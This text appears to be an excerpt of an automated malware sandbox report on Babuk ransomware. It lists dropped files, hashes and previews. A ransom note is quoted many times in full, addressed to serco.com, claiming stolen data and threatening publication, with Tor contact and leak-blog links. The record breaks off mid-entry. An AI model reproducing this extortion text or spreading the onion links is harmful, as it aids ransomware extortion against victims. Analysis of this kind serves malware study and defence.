                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):604
                                                                            Entropy (8bit):7.612242740809532
                                                                            Encrypted:false
                                                                            SSDEEP:12:SQnCQDBLbtfp+ClJCun9Tz2paukX9qu3T:4QDB/tfpDFZOa313T
                                                                            MD5:09E4628E49FE6EA3309AABC0C31034B9
                                                                            SHA1:BD0B896CD38D97316FB57A32962C10F66E1E75FA
                                                                            SHA-256:696DF1A0971271257FBCCDB97B4F761D9F22CFDA75D1A81980E261CD0F2C9D5B
                                                                            SHA-512:D3D90F6D1444526B904ED5C365E76C8956ACA926AA631499FF367E6CF16FEC18F26DD6214A3E7F349B4420EAF9A2415091455FB1A127AD3C057865A20E08D6AE
                                                                            Malicious:false
                                                                            Preview: }Z...3.3N)..lMj...QZ..p../.dQ..;?|>..AA..&.>#...Bg......./.@.?.....l..mv..8....m..m#G0.Y..L2."z#DEZ... ..*$.UB..M2.........f.q;.a....d....<..0.Rt.wjM.[....I.!....4..D..e8p.)~...g...*q....%...oL.....jhM........w%k.....6<.t...>F^1.5...d.<b....@a+.-K..?.YX.h.t..^.".$.7...a~,n..Q}u..i...HC...jsk..........g.....<p...G)}.oy........!..Qoo.rz.......K.W.L^FUf....0.0-:.6..X...C9BB/ndL...8.5.{KfgM.f.IZ..V.A....@...VL..O.%.....j.....m..@...........)...9q$.U..nD%g.7^.b..g....^...^..s.}E...).B\.q..<.Y......5J..2't...k..&Na(..x..s..+r.v...q......Dv.\sD......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):169
                                                                            Entropy (8bit):6.5256521996062355
                                                                            Encrypted:false
                                                                            SSDEEP:3:yldC/2MQooPrazgh5jH8+cU0xBdwBou+H1+rX7yEMcRMkF7tXQkQBUl/aLUxNvEE:y6/2MCDYgvZcU0uZ+UfMcqe7tXQkacas
                                                                            MD5:692199F4161D0616D1C2607082609B4B
                                                                            SHA1:C0C0B32863FB3B1E666F97464841162305FABBAA
                                                                            SHA-256:018100E753358B1304C864E8E51F5020886CE875609D23DC9995CB43D6BE0C34
                                                                            SHA-512:889B2D70C75DE6EF9F4A3BBF5580A5EC57AA4A57F3E110F6A2A715BE2B697EED044DB235B636BF259DA6036ADAA39D3D9422A945CB18E0654EF19B03D704AFF7
                                                                            Malicious:false
                                                                            Preview: ....~.g..i...=.w..s.R.L24..#.C..>...wU.G[;.\.......J.9Yrf..#.;.d.3..v...F....'8N.7P[..8..QI.%...4ilW.Ph.......^y+..j5...5..f....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_00.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1586
                                                                            Entropy (8bit):7.85714238914523
                                                                            Encrypted:false
                                                                            SSDEEP:48:cyw33BXefUGKbJGirlbKGZNta7WAwkhI9v3KG:cpBpGKbJGirlbKGZNtXXEcKG
                                                                            MD5:098D7FC8D81B1D8E6EF371067A7E326A
                                                                            SHA1:3A24323BF4A519528CC06804DC7A73B811AC1FAA
                                                                            SHA-256:717511052C8F1BF939C306EB96BDF65A3ABA0431DB1F763B0A0F8FF83CF9DCD0
                                                                            SHA-512:A8E2C00E05465A6CD7E367113E15D8BA48CDCC34DBDE526C557D0AAC099E5F99738B43EF87A2F3155178D454F83A6BA0603818D91D4E3C7A10760AA191DCD56B
                                                                            Malicious:false
                                                                            Preview: ....e...w.H...........Q.(=B..C.!..(h._G.....(.nan.n.O..L....d.&}.I.U.9.:hT4.Z......D...Q.ol.Z..x0&..O-...r.4E.PH&z.~c..".o-....u..Z..^..)g....P.}....f...H6.(.V.hu.F..2.........@.WH..T.e...,2c....:......1....".......nnz\.7..i..u..Pl7HS.46..W.5..2x......||.@u.....6.N.t...P...p...`.`\.1..g.[..A-.|J|[...GA..]{..t...=.._O.s*'..w=.>.C@..=M^\f.......hZ%....w,..2.=.1+.....M.>v.."....`......l..6.p....z .p5...x.x..\...,...I...s.>.....Eo)|C..L..-.@...J.+.#.Z.tt.=U..=..6....x..}b....]..3I7..'.?.tpD.._g.t..T..d$4Y..H......^X....e..L..e.H;6.d.V.....j7......z.vY...q..Z.l.7."....b..6%Y.'..bCr._....o..7E...&.V...fHV50o3H{L...t...Fz.).L.L.-..b...$I...?.oG..<.(..+..$.9..Ov..=rE7..C..<R.V2.hP.F.n....eA...V.#...........[;.P.........w_v..i...t.$...3....A....!;.!B...(=.?..Ue...K..".2..XJ.Vu.&.J...9...t@....x:Z...h......t.B.iC.z.. ..UI.4#.ls.A.=@..B.Y.;.$.".fs<.....r.5...-....v..deR....v.....E.x...V.Z'E.aX...|.O. ./\.".7....|o.9.2.L\9..Q...s.E.\...D_6!).2...1..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_01.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):974
                                                                            Entropy (8bit):7.795712942609454
                                                                            Encrypted:false
                                                                            SSDEEP:12:GMX0HJV65sIcQ2COzMQMc6RGvYRh7RriIB8JKLuGGzFlS1B5S50AV/1YEWdpiisZ:x04qQktgGcJiIwKLuGEFc1W3/7qrs7F
                                                                            MD5:2B1BDCD1EFC941B5620F1985E8322A5F
                                                                            SHA1:5D71C7B39760EC8EFA7A5B7792B50C0AC13266F0
                                                                            SHA-256:37BB040759292F4AD11BE8289334A354FFA8EACABC4F0BDE7BF0CFEC2A270A2B
                                                                            SHA-512:CBC87F7CC46A32E46BAF28FD25AEEDAF2BE30AF0A3199D434BD429D701520E3818714F565FCA55F560AD2C2F5CB6D95722E2306B1D74402D6635B332ADD5AB39
                                                                            Malicious:false
                                                                            Preview: |.f#..c.Sk..Q(....xcC...%..|..".M....:D....m..P..EWKl...N.....@.........m.7.Q.[7..d...(|...J.2.k..S.b..n&.*X..Y..>#......t..;.....3..)|=.@..uO.K.H..}<...s\..m.;..EN1Y.1..#.B....F.....\..N:..u...?..~=.gz]B...`.T...E.}D..o.Un.......5..S....c-[...sF..b.V.`.WK..I.`}.....S..7.5..`.y..s.|1.&".}..............@..^R....._.c..J...,vs.?c.0.1|........M....?..XT..'..D.|7p......Y7........(...T6N.W....7.w..0...L.f...u.3v..Q.}.?..xB..;....5.....Zo..f..\N....Bw..O.....-^.+;.8.................C...Q=.?....".......b...$...............4.....Cp./..@.....:.c......3....R.l.S.v^....A.Un)(....6/.&.c.... ]..=........[h..F....BG....R[CX.I3.......U............*.&.....i..(yk!....rz..u......{.`...`s.]......]2..-...&1..S.=1n.3.u).].FM;..^..i.;x+...4..E....E.j.>j.c....$.Kq.`..j...l".wCR.{....u:....".7v-...S^...Q.u.%...^.kl....5....5.J.'..........k|..:.gN...'..1..+.&..a.8/K...T......s.C.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_02.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):872
                                                                            Entropy (8bit):7.762435554512021
                                                                            Encrypted:false
                                                                            SSDEEP:24:f6xFUDYb5GtmdgcVh3DrPAyVza0bBSXcaWY/R:yfU05GmSahtlajFWY/R
                                                                            MD5:3085F4C038C5F4AD57CBC35E9C0F2C8C
                                                                            SHA1:C0858328574CF499156FE99A1985584ECF7BE278
                                                                            SHA-256:1B2FC6BEE13B671F6A32CF70049C511F15E0405EBCC82C9239E27F8127C1AC25
                                                                            SHA-512:136805BD8D04501CDE05237D21E017CFDB6F2EA9FE0C532E7D331AEFE6AC631FA27BB20C82E1B0E6C119E7D7C4EDA4B21F824BD773F630BB9DD66AADA0A790A3
                                                                            Malicious:false
                                                                            Preview: .K...P.X..g..Q...;......o.J.=|..B/,<....EW.iV..m..x.......|.RW.f.E.".t.C ..3.../t.....sb...a......@|..QW.\.Ipd......1...Y5..'.Z_.OZ#........,.cW1....}-'>.F..$....s......t.E'...f{K.Q.$.8.b;bxQCU#...%[+..8..h...s..r..g...(..L.....T5...!.~.4H..<.....*...$q..H4........._\.3..U..d'fR.u+..pK...........-.w\....JW.G..".&..b..........Z.I......Q.....`..v...*.m.I...b!{*/..;Wk`]v...blE..........EL...'..C.;.1......q..-.].......`..B.%.....].D.....NJ)..n..@....R..+..9...........x...-<=.xe>,q..I..4C....[..O......D.nR..:hRo...g..V.E$..h.l..HY.6.....y..J/.P.g...........~=.'..dsf...`......Al;...L0.........?..3@...t<....Z:S*)._.....f..e..d.p..%7.;.O._...nf.F.........Z...2JGQ......s..%..../.......].o...8;.B.'P..X...V...B...Y..t`......&P....5.#..oR..:0.h..}i.P.<+......q....p.g.^...;...8.U.}.O5.}?.@.@....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_03.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1064
                                                                            Entropy (8bit):7.798434990300372
                                                                            Encrypted:false
                                                                            SSDEEP:24:f14Tmjwxm/Nl0BTqLHpj+2DbuNVWvKYNLk5o7wv6wy:t4OQpgHpK2HHvKyL8y
                                                                            MD5:D617A4216A91D33A4622D011DFEC3B1B
                                                                            SHA1:F2EB81B743B7379B332A018629AAF421D4E9436A
                                                                            SHA-256:597C56E889D967B686372B2117C8716B8D309E5E8E804CBB314293D0B31520DF
                                                                            SHA-512:AAFF591F2BC1554BA9BDB2F1751A96F7B619E97208BE625543288914172E191F4B4889AFE934538423D0D70D25F655505B7C654B264DDC6B25698BA17B8552E8
                                                                            Malicious:false
                                                                            Preview: .+.6X[.?....*..-..He....mB..%..G.1.(.H.1+:..I..6/....P..m.SN.~D|,8Wn[F.3.iHV,E=.<k........Y..^.7p.3.X..:2..u^P.l..m.?VbN.....@.u...W.Q.f.i...w./..PNf....._..;.&>Y......2..I.m..j...... .-^....:.W..k..d..<...!i...Y..O../. .@..h.V1.S....>....i......a..)c0.$.#..d.*YN./...s.........v.`.F=}.A..(.D.ic b....V.U.3Vt..............h..?.;.97.*F.u..h...MVCA9..3.....|!.R.y.>3d......f..V..xV.R......r....... =..A....../.....5...n....s`...$.o.....k......R...4M.je..2k^rK..r..]...l..{z..{6X..J.g.Y...<..6N.....i...qP....&.?......H.`i...j...Z.."e.[.K.0qko.P.8$Pu.v..&.h..:&$KeI..MZ.0.N.........m5.~.yYoN....u.2."...f`.........mm...F....yI..Y...w.m.i....#r..X..$...Y....s]..z...S.<.<......:/!}'.y/.....Q..#..7...T\..m...5l.'o.p..G?|..7P}n8[...N.z.W?../..A...5.v.nbr3].....;.E...0.K.....?...]#i..~..7...x/p.s,X..iCU..SJ...S.P@X4...Q..Y&.-..........Q.M0..0V.8..!x...h........oG....B;(......%.l9Wv..P..jM......T."j9Y.....&...............!..^i...'8.y.1....\ 8....f...'.
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_04.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.794673698485358
                                                                            Encrypted:false
                                                                            SSDEEP:24:OW+C7gQfAfC1GZl023j/nc5n+tGRN2Pd0KJlj/rgQxP:OvCxAfCml02dGsPaKD/0Q9
                                                                            MD5:0FE72FD3E706A0A51D997DD69338FE0C
                                                                            SHA1:E3B5B4AED82890F1E70E4A77090D0155BE32C91F
                                                                            SHA-256:968F4EA72D40C6A365F3B237E8AC78C622DD56EBAD3313B2A33FDF6D1ECFD3C7
                                                                            SHA-512:7F2E0053DE2766BED533E4349DF3AC40D081AA456C9ED86BAF3A74EB90336B16655EE7907C8065885F1829A9747E88C9F92B7F1ED21BFCDC63589C55532BFF24
                                                                            Malicious:false
                                                                            Preview: Y..N,.....&..........T.(iy.(.$.........]T....>iG= N..m....opt..]I..4...sw...O.E..QF...}2./S..F@...Hd`...h.<.<,@.....Ei...........?....OA..j.Nk._.......M...4..3r.6|{...l@..;.f......R..W...F..kPG....{._q(.Y....s.F.....N .7.0.t.u..t....f...v.&.H..HY....y..p....9u.T.......>_b....G...._.{.i,.X...f^...4.D2..s1=_.F0...`...%t.O....#..)<..B.vnV].u...n).j..m..B..g%.......N..J..a.lp..;.+..Z.$..v.2.Z...9..!.tB.V..xz..OF.?.......+.._LMHUZ...rT.+...<..'...]k...0.P]L.tQD..0Wn..t..l..d.B.....]&.......j.........$.O.....f...0r'.....\...V.<D-q.m..|=}7.Z.Q...k...kU.......C...n.b[.|..d44.H.f4p.Q......U<.hq...A.$.......}4.F..C..3...s..t.Lv.;.>.......7.|5...9....H...Y..Kc..b...C.mP..!5[Jfn............J..s.j5...L..g...|*....U..iq.&....%..:..,.KC..x%..'........F....N.|..0.....u\........j...G.:...>...D.........1....PJc........C..kF....bb...{.p~....~k..^ .@.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_05.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):912
                                                                            Entropy (8bit):7.780805078676036
                                                                            Encrypted:false
                                                                            SSDEEP:24:Uco1gB2qSXz0XuOwZ9A2IwgbYDDHEqrl5wg2s:Fo1E+zkuOs97IwL3Bl5Z
                                                                            MD5:7456233E8BAE710CF438BD679A2E95AB
                                                                            SHA1:D1680DD8E5A9263BB7D1E6FDAA54EFF119505CA4
                                                                            SHA-256:66040CC54F5CCD222024F18EFEB6B10A84AE8BAA1AE37EC146185C4A3FEC2179
                                                                            SHA-512:606CF2CAD76E7D4935B49DB5E66984B1538FE70D9F781AEDBFFDAAE5CFF93C998C9185B2809CD82FC1FE1154981C7DC69DE9557F232DD864D508A21795EF4F5E
                                                                            Malicious:false
                                                                            Preview: .$.(....P.|e.Y&./..L.....k.......z:.....!^.kda.^..'....4.....m.^..zq....)! ./&....W....d............D..I.d....h[y.H...I.#..|.h..N.Fb.L..h.nOnF..-L..q.}q...4w.I_..a....&..j.<@..s.....N..a.."..3.Rg...{.% _.Yp.rj.q2.y.ZI...Q<.]...e.._...`.1.|..........5i.JMhH.b...?>v.R)._Xc2...K.C...N..OQbd........zU..'./.b.,.F..........m.7v-5~.\.+.x[...bQIG....].=}zb.........j..A..Y.............:...B.o.l..Z...d?..9..G......-G.2.........h.2 .R-.`y..a.d)f@...J{.+...M...Z...7_"....w...7.5.s...3...d...I..+....kj.....&..y.M.y`x@$.(.T..V+..2..~my..i.w<Q.<..]I...q<.w.l.m..e........3....T47.OX.-S.`s..Yb*...XV.R....v.....FB.?;...Y.t.$-.uj..=.L.d..9....o..X....x.....a..Z...[|.i.....kx..F....d......jM#...05`/.I..{...e.:.I..H.M........I.....u..Z.....zXR...(.m).D.kI"..&..T.M.....$....1$E1'.=7Q........M...U8n%..A..g.;..X;.jX...T...<......)\$..K.....O1{.b......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_06.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.727927690899357
                                                                            Encrypted:false
                                                                            SSDEEP:24:2A5uOxyfOgs1tUdfdbXCiZaVEbl7QKgBjEtcu9AUB6s:niGguUNdbXta5Bjs16UBp
                                                                            MD5:92CD4224489008527079159A309205E8
                                                                            SHA1:9AA9409EBADFBE61DDBF706C18EA16A12CEF6994
                                                                            SHA-256:D09FFDDD45B6FBCD50BB76153634D844250847380054C6A5D66FB66130959A60
                                                                            SHA-512:5A4EAED52B176B9F4115849D40F97B696B468633C40CAB88CA0389A5FBB99ADC19816F909AA697105339A795FD973A60FAA34983506998AD841E1533A1902F49
                                                                            Malicious:false
                                                                            Preview: ..6.ClZ.....o.~.P}.5v.......d&...l.Z.`..^]..1RS.5m..=..6.U..3.RF..Y5..FseK9..L.G.'.x....e...A...y...[O..*...Wc...s..4..:.l'..}eG..DC.)._.#w.....n.6..>E..Y.....^ ...8S%...X...&..g...Eb.a8..}{U.`..I.!..j.F..kMG.U..M....l....rn ...b.'.s.g>I..w3..^.+.g..!..W/E.1.....'N..'$D`|....9A......u...Gh....i.Y.3>.W...O...s..T..'ZP..V...a....+foi...:N.yd.hr...\.7!.90.w...|..:.g.......'..fW2......O..S...?TT..c )uP?.@N.a..U...O..S.km.S.>J....W...9...o}..F..k...3......f.......|.i...sr6...tb..U.<j..S...!...?0..S].......?.....Eu..*5Fu.1&....Q......iS.8z.6..*:...vN.......v..pw.ID \..%...0.M..$..$/6..4~.....kr.....'#.R..N.1..E..YP|....F.u.|..oBl......q.......H...+.Y.#.....].z|.#.!.."...}_&......Gd..%..=)B.N...!..z.....d.o.W.?.l$S:U.|....%.....y... .U6&.y.B4.e..t.CI.T7.,..'Q.E.I...b....D..!w..JC.T>.@.....>g....g........5d... ](.".g$.?.B..t2...{.y..E..!zW...}....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_07.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):912
                                                                            Entropy (8bit):7.76515306987388
                                                                            Encrypted:false
                                                                            SSDEEP:24:edqFClednCA0o82NDVUq2Wy7X5v5f8seey9nDlBUMYjG50PHs:FF399Vfy1Q1nHUG0PHs
                                                                            MD5:1B0C75C7C3B28537FED3B206311D8DFB
                                                                            SHA1:3B5FAC082C0C617BEA567802BDC53E90B25AAA65
                                                                            SHA-256:161F5D8AEEF390F944B457680E6ACB36AB335DB5AD37932102DC6DE62B9593B7
                                                                            SHA-512:FDAC6487E7D590B63075A66B9B4C38A00BC2B532BF066BB64D9C01FC8291827106E8768586F1F1EA317A5654D423AFCDF3FCE0645297F29E0628C3C3396C40DE
                                                                            Malicious:false
                                                                            Preview: .v..U...W.Y..l,.(t&=:.*.)...y..Hk|.NE.e4x....U..:f. .*......h.dsc........=...m...Q....E..P2.e....,!...> k...!. .].4.`.;.4.N.y..._..}.:..K..j@.+...........'$.e6..2)or.......yc..'.h..D.!..A..;^....j...U....y..r..x...D..].....:".R...-.0.~Q...d..?^..... N..6.&G....E.....!.fuC9+.wB8..y)...FG..A.w|..?&.?bu|..jy.v..D.y...'v.h.c.w..?.!.4...w...m....7..V.E@X...M.B..GO..h....,_..7.....)Gn}hA...#...E..:.....03X....hc....C..{..yD`...Ma.rz..^.....:........I..H.p.6./....,E.2.=y.....B..s_...}O3..H`.*.USg9.6..V......../...'A=0.....R./..d|.H..i......pj....Vdl..K..+T...j0.B.@...h.9..[.h.zf..j.i.JM.7q.ZQ.?;..#9......V......U.o$S..sV.OvT..-.....#..N.\m...J7...c........=....3=;...bt_S.O....O...T0.....9..r.>...BqT.(.{....l.....L..=.uc.}.s. ...E..#.X.....n. ..JU./.T.'p|....../D...-f~...=...../E.gX.m..U..(...D..J......R).=C.i.<0>.0u4E....5.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_08.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.764997848746469
                                                                            Encrypted:false
                                                                            SSDEEP:24:+9sZXT2g58TEg/vOZNMWCmC+yshvgewRhHWZnqbZS6:+9qewQvKz3CKhvgLRhH4MZ
                                                                            MD5:8F7EFC6385E0B0283E6B9D2E04A9F2DE
                                                                            SHA1:8259546FA82F908D6E5822186CD614BED25AF8E7
                                                                            SHA-256:873FC2930324B4EA7C7AABA7A44908BBEF262DFE6C92047AA419EC4DAAE855FB
                                                                            SHA-512:023AADC0A5E5DF39969C48245FAAE7530867844C8B925B25CD12B20BB6BA1BBD1138C554DC004C861C8AC6FBDB4BF8BA3FB220E5D1F6561D984B18985930A787
                                                                            Malicious:false
                                                                            Preview: .&=~G.N...w.."}..:.+..6:{.o..L..K.).....6`..?...U.."{.05.e..{,>.....I.w.6zm..f..0.,..[..$!.S..w..wn2.D.4<H[..uV....'.3#0.&..Y.....l...J.<_t..X...X.7..x.jo..;G...Dn..L....~..j8_....[.[.E)..M=.w..r.m..=..+.(]...iS.z.....@'(...f...G...&>.D.Z...Z.......>f.:e%.........B.T)..?...[.AA[.;Om..H|).r$<.2O{.9..Z.R...S.O.A&bF......;d..'...w.....y...J...M.....Og{).=b.....j/qTQHH...."d.)'........\.:Y....*....|k......U.6....\.R..lc.P.BQ..+......VQ/....i/"..`e.{..W.KWp.........D'i.f:......dM.mF../.A.wgjs.=w>.ht(\.......yq..R.1H..9o.Fl..A.:.A#.U...n.r.}..(...vD...G.._eA$.N.dq...b"....ZH.o..l.{]U...&L...`....#*Bx._.5....b....O~.9.?..[g..$s,RS&R.P.D.0{..`3V,T6a...}\$V.St.....p.w.[...0..m.....2.....;.L1."=...k.w..#..D....Z... XVP;..Ezcdx .T#6U.......#..+..(#.q/f.1...l.......M1.p...B.V`../.3.].....#<.....D.q......d.-.B.4....p..?.BB....[.%.B.....)....}..X!zN..(.R..;m....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
